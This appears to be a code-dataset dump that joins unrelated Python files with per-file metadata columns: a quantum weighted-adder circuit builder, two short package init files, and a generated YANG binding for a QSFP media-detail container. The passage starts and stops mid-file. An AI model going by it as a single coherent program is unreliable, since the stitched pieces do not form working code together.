                    circ.mct([q_state, qr_sum[j], qr_carry[j - 1]], qr_carry[j], qr_control, mode='basic')
                    circ.cx(q_state, qr_carry[j])
                    circ.x(qr_sum[j])
                    circ.x(qr_carry[j - 1])
                    circ.cx(q_state, qr_sum[j])
                    circ.ccx(q_state, qr_carry[j - 1], qr_sum[j])
            else:
                if num_sum_qubits == 1:
                    pass  # nothing to do, since nothing to add
                elif j == 0:
                    pass  # nothing to do, since nothing to add
                elif j == num_sum_qubits - 1:
                    # compute (q_sum[j] + q_carry[j-1]) into (q_sum[j])
                    # - controlled by q_state[i] / last qubit,
                    # no carry needed by construction
                    circ.ccx(q_state, qr_carry[j - 1], qr_sum[j])
                else:
                    # compute (q_sum[j] + q_carry[j-1]) into (q_sum[j], q_carry[j])
                    # - controlled by q_state[i]
                    circ.mct([q_state, qr_sum[j], qr_carry[j - 1]], qr_carry[j], qr_control, mode='basic')
                    circ.ccx(q_state, qr_carry[j - 1], qr_sum[j])
        # Uncompute the carry qubits of this iteration (reverse bit order).
        for j in reversed(range(len(weight_binary))):
            bit = weight_binary[j]
            if bit == '1':
                if num_sum_qubits == 1:
                    pass
                elif j == 0:
                    circ.x(qr_sum[j])
                    circ.ccx(q_state, qr_sum[j], qr_carry[j])
                    circ.x(qr_sum[j])
                elif j == num_sum_qubits - 1:
                    pass
                else:
                    circ.x(qr_carry[j - 1])
                    circ.mct([q_state, qr_sum[j], qr_carry[j - 1]], qr_carry[j], qr_control, mode='basic')
                    circ.cx(q_state, qr_carry[j])
                    circ.x(qr_carry[j - 1])
            else:
                if num_sum_qubits == 1:
                    pass
                elif j == 0:
                    pass
                elif j == num_sum_qubits - 1:
                    pass
                else:
                    # uncompute (q_sum[j] + q_carry[j-1]) from (q_carry[j])
                    # - controlled by q_state[i]
                    circ.x(qr_sum[j])
                    circ.mct([q_state, qr_sum[j], qr_carry[j - 1]], qr_carry[j], qr_control, mode='basic')
                    circ.x(qr_sum[j])
    return circ
def makeWeightedAdderWOExtraCtrlsQb(num_state_qubits, weights):
    """Build the weighted adder with Unqomp while enforcing a single shared
    mct control ancilla.

    Uses fewer qubits than :func:`makeWeightedAdder`, but is not fully
    modular: the ancillas have to be taken care of manually, since the
    multi-controlled gates are appended as opaque Qfree gates that route
    through the shared ``ctrl`` qubit.

    :param num_state_qubits: number of state (control) qubits.
    :param weights: one weight per state qubit; values must be numerically
        close to integers. The caller's list is NOT modified (the previous
        version wrote the rounded values back in place).
    :return: an :class:`AncillaCircuit` over registers ``state``, ``sum`` and
        ``ctrl`` plus per-weight carry ancilla registers.
    :raises ValueError: if any weight is not close to an integer.
    """
    def neg_mct_gate(negated_ctrls):
        # Build a 3-control Toffoli (mcx mode='basic', one ancilla) with the
        # controls listed in `negated_ctrls` negated via X conjugation.
        # Qubit order of the resulting gate: [ctrl0, ctrl1, ctrl2, anc, targ].
        ctrls = QuantumRegister(3)
        anc = QuantumRegister(1)
        targ = QuantumRegister(1)
        neg_mct = QuantumCircuit(ctrls, anc, targ)
        for i in negated_ctrls:
            neg_mct.x(ctrls[i])
        neg_mct.mcx(ctrls, targ, anc, mode='basic')
        for i in negated_ctrls:
            neg_mct.x(ctrls[i])
        return neg_mct.to_gate()

    # Number of sum qubits needed to hold sum(weights); at least 1.
    num_sum_qubits = int(np.floor(np.log2(sum(weights))) + 1) if sum(weights) > 0 else 1
    # Number of carry qubits required to compute the sum.
    num_carry_qubits = num_sum_qubits - 1

    # Validate and round the weights into a local list instead of mutating
    # the caller's argument.
    int_weights = []
    for weight in weights:
        if not np.isclose(weight, np.round(weight)):
            raise ValueError('Non-integer weights are not supported!')
        int_weights.append(int(np.round(weight)))

    qr_state = QuantumRegister(num_state_qubits, name='state')
    qr_sum = QuantumRegister(num_sum_qubits, name='sum')
    qr_ctrl = QuantumRegister(1, name='ctrl')
    circuit = AncillaCircuit(qr_state, qr_sum, qr_ctrl)

    # Pre-build the two flavours of the shared-ancilla mct and register them
    # as qfree so Unqomp may uncompute through them.
    neg_mct_g = neg_mct_gate([1, 2])
    mct_g = neg_mct_gate([])
    circuit.addQfreeGate(neg_mct_g)
    circuit.addQfreeGate(mct_g)

    # Loop over state qubits and their corresponding weights.
    for i, weight in enumerate(int_weights):
        # Only act on non-trivial weights.
        if weight == 0:
            continue
        # State qubit controlling this weight's addition.
        q_state = qr_state[i]
        # Bit representation of the current weight, least-significant bit first.
        weight_binary = '{0:b}'.format(weight).rjust(num_sum_qubits, '0')[::-1]
        # Fresh carry ancillas for this weight.
        qr_carry = circuit.new_ancilla_register(num_carry_qubits, name="anccarryite" + str(i))
        # Add each bit of the current weight into the sum and carry registers.
        for j, bit in enumerate(weight_binary):
            if bit == '1':
                if num_sum_qubits == 1:
                    circuit.cx(q_state, qr_sum[j])
                elif j == 0:
                    # compute (q_sum[0] + 1) into (q_sum[0], q_carry[0])
                    # - controlled by q_state[i]
                    circuit.ccx(q_state, qr_sum[j], qr_carry[j])
                    circuit.cx(q_state, qr_sum[j])
                elif j == num_sum_qubits - 1:
                    # compute (q_sum[j] + q_carry[j-1] + 1) into (q_sum[j])
                    # - controlled by q_state[i] / last qubit,
                    # no carry needed by construction
                    circuit.cx(q_state, qr_sum[j])
                    circuit.ccx(q_state, qr_carry[j - 1], qr_sum[j])
                else:
                    # compute (q_sum[j] + q_carry[j-1] + 1) into (q_sum[j], q_carry[j])
                    # - controlled by q_state[i]; gate qubit order is
                    # [ctrl0, ctrl1, ctrl2, anc, targ]
                    circuit.append(neg_mct_g, [q_state, qr_sum[j], qr_carry[j - 1], qr_ctrl, qr_carry[j]])
                    circuit.cx(q_state, qr_carry[j])
                    circuit.cx(q_state, qr_sum[j])
                    circuit.ccx(q_state, qr_carry[j - 1], qr_sum[j])
            else:
                if num_sum_qubits == 1:
                    pass  # nothing to do, since nothing to add
                elif j == 0:
                    pass  # nothing to do, since nothing to add
                elif j == num_sum_qubits - 1:
                    # compute (q_sum[j] + q_carry[j-1]) into (q_sum[j])
                    # - controlled by q_state[i] / last qubit,
                    # no carry needed by construction
                    circuit.ccx(q_state, qr_carry[j - 1], qr_sum[j])
                else:
                    # compute (q_sum[j] + q_carry[j-1]) into (q_sum[j], q_carry[j])
                    # - controlled by q_state[i]
                    circuit.append(mct_g, [q_state, qr_sum[j], qr_carry[j - 1], qr_ctrl, qr_carry[j]])
                    circuit.ccx(q_state, qr_carry[j - 1], qr_sum[j])
    return circuit
| 47.163043
| 155
| 0.546362
| 1,808
| 13,017
| 3.721239
| 0.091261
| 0.041023
| 0.052319
| 0.040874
| 0.812426
| 0.799197
| 0.788644
| 0.782996
| 0.776605
| 0.758918
| 0
| 0.014904
| 0.345394
| 13,017
| 275
| 156
| 47.334545
| 0.774674
| 0.263041
| 0
| 0.811111
| 0
| 0
| 0.019124
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022222
| false
| 0.061111
| 0.022222
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
7ce4f223c43db53ccd3c978550cb7d82409e2885
| 73
|
py
|
Python
|
reactivepy/__init__.py
|
dldx/reactivepy
|
d96ed3fd163647088c2d0fc35e930b7946ecb7c5
|
[
"BSD-3-Clause"
] | 73
|
2018-08-17T23:27:57.000Z
|
2022-02-11T19:55:51.000Z
|
reactivepy/__init__.py
|
dldx/reactivepy
|
d96ed3fd163647088c2d0fc35e930b7946ecb7c5
|
[
"BSD-3-Clause"
] | 18
|
2018-08-27T09:12:07.000Z
|
2021-09-02T08:43:00.000Z
|
reactivepy/__init__.py
|
dldx/reactivepy
|
d96ed3fd163647088c2d0fc35e930b7946ecb7c5
|
[
"BSD-3-Clause"
] | 7
|
2018-08-17T23:27:50.000Z
|
2021-04-17T16:03:09.000Z
|
from .kernel import ReactivePythonKernel
from .kernel import __version__
| 24.333333
| 40
| 0.863014
| 8
| 73
| 7.375
| 0.625
| 0.338983
| 0.542373
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109589
| 73
| 2
| 41
| 36.5
| 0.907692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6b00c9bee88cf06a425fb738bf834bc44ad6d464
| 124
|
py
|
Python
|
src/sage/rings/polynomial/weil/all.py
|
LaisRast/sage
|
5fb2a6ea44400e469caee82748cf863ca0c5f724
|
[
"BSL-1.0"
] | null | null | null |
src/sage/rings/polynomial/weil/all.py
|
LaisRast/sage
|
5fb2a6ea44400e469caee82748cf863ca0c5f724
|
[
"BSL-1.0"
] | null | null | null |
src/sage/rings/polynomial/weil/all.py
|
LaisRast/sage
|
5fb2a6ea44400e469caee82748cf863ca0c5f724
|
[
"BSL-1.0"
] | null | null | null |
from sage.misc.lazy_import import lazy_import
# Expose WeilPolynomials at this package level without paying the import cost
# until it is first accessed.
lazy_import('sage.rings.polynomial.weil.weil_polynomials', 'WeilPolynomials')
| 41.333333
| 77
| 0.846774
| 17
| 124
| 5.941176
| 0.588235
| 0.29703
| 0.316832
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.048387
| 124
| 2
| 78
| 62
| 0.855932
| 0
| 0
| 0
| 0
| 0
| 0.467742
| 0.346774
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6b1380b1c2714a15bfde44abdbfc677e5edf6fe1
| 60,602
|
py
|
Python
|
pybind/slxos/v17s_1_02/brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v17s_1_02/brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v17s_1_02/brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | 1
|
2021-11-05T22:15:42.000Z
|
2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class qsfp(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-interface-ext - based on the path /brocade_interface_ext_rpc/get-media-detail/output/interface/qsfp. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__speed','__connector','__encoding','__vendor_name','__vendor_oui','__vendor_pn','__vendor_rev','__distance','__media_form_factor','__wavelength','__serial_no','__date_code','__temperature','__voltage','__current','__tx_power','__rx_power',)
_yang_name = 'qsfp'
_rest_name = 'qsfp'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__distance = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'short-dist': {'value': 1}, u'unknown': {'value': 4}, u'long-dist': {'value': 3}, u'inter-dist': {'value': 2}},), is_leaf=True, yang_name="distance", rest_name="distance", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
self.__vendor_rev = YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-rev", rest_name="vendor-rev", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
self.__encoding = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'sonet-scrambled': {'value': 9}, u'4b5b': {'value': 6}, u'rz': {'value': 1}, u'8b10b': {'value': 4}, u'nrz': {'value': 2}, u'sonet': {'value': 3}, u'manchester': {'value': 7}, u'unknown': {'value': 10}, u'64b66b': {'value': 5}, u'ieee-802-3ab': {'value': 8}},), is_leaf=True, yang_name="encoding", rest_name="encoding", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
self.__vendor_oui = YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-oui", rest_name="vendor-oui", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
self.__serial_no = YANGDynClass(base=unicode, is_leaf=True, yang_name="serial-no", rest_name="serial-no", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
self.__media_form_factor = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'tv': {'value': 5}, u'tw': {'value': 8}, u'mi': {'value': 6}, u'tp': {'value': 7}, u'm5': {'value': 3}, u'm6': {'value': 4}, u'sm': {'value': 1}, u'unknown': {'value': 9}, u'mx': {'value': 2}},), is_leaf=True, yang_name="media-form-factor", rest_name="media-form-factor", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
self.__connector = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'no-separable-connector': {'value': 36}, u'mpo-parallel-optic': {'value': 12}, u'style-2-copper': {'value': 3}, u'mpo': {'value': 13}, u'fiber-jack': {'value': 6}, u'unknown': {'value': 35}, u'bnc-tnc': {'value': 4}, u'style-1-copper': {'value': 2}, u'mu': {'value': 9}, u'cat-5-copper-cable': {'value': 34}, u'copper-pigtail': {'value': 33}, u'optical-pigtail': {'value': 11}, u'coaxial': {'value': 5}, u'hssdc-ii': {'value': 32}, u'sc': {'value': 1}, u'sg': {'value': 10}, u'mt-rj': {'value': 8}, u'lc': {'value': 7}},), is_leaf=True, yang_name="connector", rest_name="connector", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
self.__date_code = YANGDynClass(base=unicode, is_leaf=True, yang_name="date-code", rest_name="date-code", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
self.__tx_power = YANGDynClass(base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="tx-power", rest_name="tx-power", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
self.__voltage = YANGDynClass(base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="voltage", rest_name="voltage", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
self.__vendor_pn = YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-pn", rest_name="vendor-pn", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
self.__rx_power = YANGDynClass(base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="rx-power", rest_name="rx-power", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
self.__wavelength = YANGDynClass(base=unicode, is_leaf=True, yang_name="wavelength", rest_name="wavelength", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
self.__current = YANGDynClass(base=RestrictedPrecisionDecimalType(precision=3), is_leaf=True, yang_name="current", rest_name="current", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
self.__vendor_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-name", rest_name="vendor-name", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
self.__speed = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'8Gbps': {'value': 9}, u'nil': {'value': 1}, u'40Gbps': {'value': 5}, u'1Gbps': {'value': 3}, u'auto': {'value': 2}, u'25Gbps': {'value': 12}, u'10Gbps': {'value': 4}, u'4Gbps': {'value': 8}, u'100Gbps': {'value': 11}, u'100Mbps': {'value': 6}, u'16Gbps': {'value': 10}, u'2Gbps': {'value': 7}},), is_leaf=True, yang_name="speed", rest_name="speed", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='line-speed', is_config=True)
self.__temperature = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="temperature", rest_name="temperature", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='uint32', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'brocade_interface_ext_rpc', u'get-media-detail', u'output', u'interface', u'qsfp']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'get-media-detail', u'output', u'interface', u'qsfp']
def _get_speed(self):
"""
Getter method for speed, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/speed (line-speed)
YANG Description: The actual line speed of this interface.
"""
return self.__speed
def _set_speed(self, v, load=False):
"""
Setter method for speed, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/speed (line-speed)
If this variable is read-only (config: false) in the
source YANG file, then _set_speed is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_speed() directly.
YANG Description: The actual line speed of this interface.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'8Gbps': {'value': 9}, u'nil': {'value': 1}, u'40Gbps': {'value': 5}, u'1Gbps': {'value': 3}, u'auto': {'value': 2}, u'25Gbps': {'value': 12}, u'10Gbps': {'value': 4}, u'4Gbps': {'value': 8}, u'100Gbps': {'value': 11}, u'100Mbps': {'value': 6}, u'16Gbps': {'value': 10}, u'2Gbps': {'value': 7}},), is_leaf=True, yang_name="speed", rest_name="speed", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='line-speed', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """speed must be of a type compatible with line-speed""",
'defined-type': "brocade-interface-ext:line-speed",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'8Gbps': {'value': 9}, u'nil': {'value': 1}, u'40Gbps': {'value': 5}, u'1Gbps': {'value': 3}, u'auto': {'value': 2}, u'25Gbps': {'value': 12}, u'10Gbps': {'value': 4}, u'4Gbps': {'value': 8}, u'100Gbps': {'value': 11}, u'100Mbps': {'value': 6}, u'16Gbps': {'value': 10}, u'2Gbps': {'value': 7}},), is_leaf=True, yang_name="speed", rest_name="speed", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='line-speed', is_config=True)""",
})
self.__speed = t
if hasattr(self, '_set'):
self._set()
def _unset_speed(self):
self.__speed = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'8Gbps': {'value': 9}, u'nil': {'value': 1}, u'40Gbps': {'value': 5}, u'1Gbps': {'value': 3}, u'auto': {'value': 2}, u'25Gbps': {'value': 12}, u'10Gbps': {'value': 4}, u'4Gbps': {'value': 8}, u'100Gbps': {'value': 11}, u'100Mbps': {'value': 6}, u'16Gbps': {'value': 10}, u'2Gbps': {'value': 7}},), is_leaf=True, yang_name="speed", rest_name="speed", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='line-speed', is_config=True)
def _get_connector(self):
"""
Getter method for connector, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/connector (enumeration)
YANG Description: This specifies the type of connector
connected to the interface.
"""
return self.__connector
def _set_connector(self, v, load=False):
"""
Setter method for connector, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/connector (enumeration)
If this variable is read-only (config: false) in the
source YANG file, then _set_connector is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_connector() directly.
YANG Description: This specifies the type of connector
connected to the interface.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'no-separable-connector': {'value': 36}, u'mpo-parallel-optic': {'value': 12}, u'style-2-copper': {'value': 3}, u'mpo': {'value': 13}, u'fiber-jack': {'value': 6}, u'unknown': {'value': 35}, u'bnc-tnc': {'value': 4}, u'style-1-copper': {'value': 2}, u'mu': {'value': 9}, u'cat-5-copper-cable': {'value': 34}, u'copper-pigtail': {'value': 33}, u'optical-pigtail': {'value': 11}, u'coaxial': {'value': 5}, u'hssdc-ii': {'value': 32}, u'sc': {'value': 1}, u'sg': {'value': 10}, u'mt-rj': {'value': 8}, u'lc': {'value': 7}},), is_leaf=True, yang_name="connector", rest_name="connector", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """connector must be of a type compatible with enumeration""",
'defined-type': "brocade-interface-ext:enumeration",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'no-separable-connector': {'value': 36}, u'mpo-parallel-optic': {'value': 12}, u'style-2-copper': {'value': 3}, u'mpo': {'value': 13}, u'fiber-jack': {'value': 6}, u'unknown': {'value': 35}, u'bnc-tnc': {'value': 4}, u'style-1-copper': {'value': 2}, u'mu': {'value': 9}, u'cat-5-copper-cable': {'value': 34}, u'copper-pigtail': {'value': 33}, u'optical-pigtail': {'value': 11}, u'coaxial': {'value': 5}, u'hssdc-ii': {'value': 32}, u'sc': {'value': 1}, u'sg': {'value': 10}, u'mt-rj': {'value': 8}, u'lc': {'value': 7}},), is_leaf=True, yang_name="connector", rest_name="connector", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)""",
})
self.__connector = t
if hasattr(self, '_set'):
self._set()
def _unset_connector(self):
self.__connector = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'no-separable-connector': {'value': 36}, u'mpo-parallel-optic': {'value': 12}, u'style-2-copper': {'value': 3}, u'mpo': {'value': 13}, u'fiber-jack': {'value': 6}, u'unknown': {'value': 35}, u'bnc-tnc': {'value': 4}, u'style-1-copper': {'value': 2}, u'mu': {'value': 9}, u'cat-5-copper-cable': {'value': 34}, u'copper-pigtail': {'value': 33}, u'optical-pigtail': {'value': 11}, u'coaxial': {'value': 5}, u'hssdc-ii': {'value': 32}, u'sc': {'value': 1}, u'sg': {'value': 10}, u'mt-rj': {'value': 8}, u'lc': {'value': 7}},), is_leaf=True, yang_name="connector", rest_name="connector", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
def _get_encoding(self):
"""
Getter method for encoding, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/encoding (enumeration)
YANG Description: This indicates the type of encoding used to
transmit the data on this interface.
"""
return self.__encoding
  def _set_encoding(self, v, load=False):
    """
    Setter for the ``encoding`` leaf (enumeration), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/encoding.
    If this leaf is read-only (config: false) in the source YANG, this setter
    is considered private; backends populate it by calling
    thisObj._set_encoding() directly.
    YANG description: the type of encoding used to transmit the data on
    this interface.

    :param v: new value; coerced into the generated restricted enumeration type.
    :param load: not used in this method body; kept for generator API compatibility.
    :raises ValueError: if ``v`` cannot be coerced into the enumeration.
    """
    # Normalize values that already carry a YANG type converter.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'sonet-scrambled': {'value': 9}, u'4b5b': {'value': 6}, u'rz': {'value': 1}, u'8b10b': {'value': 4}, u'nrz': {'value': 2}, u'sonet': {'value': 3}, u'manchester': {'value': 7}, u'unknown': {'value': 10}, u'64b66b': {'value': 5}, u'ieee-802-3ab': {'value': 8}},), is_leaf=True, yang_name="encoding", rest_name="encoding", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """encoding must be of a type compatible with enumeration""",
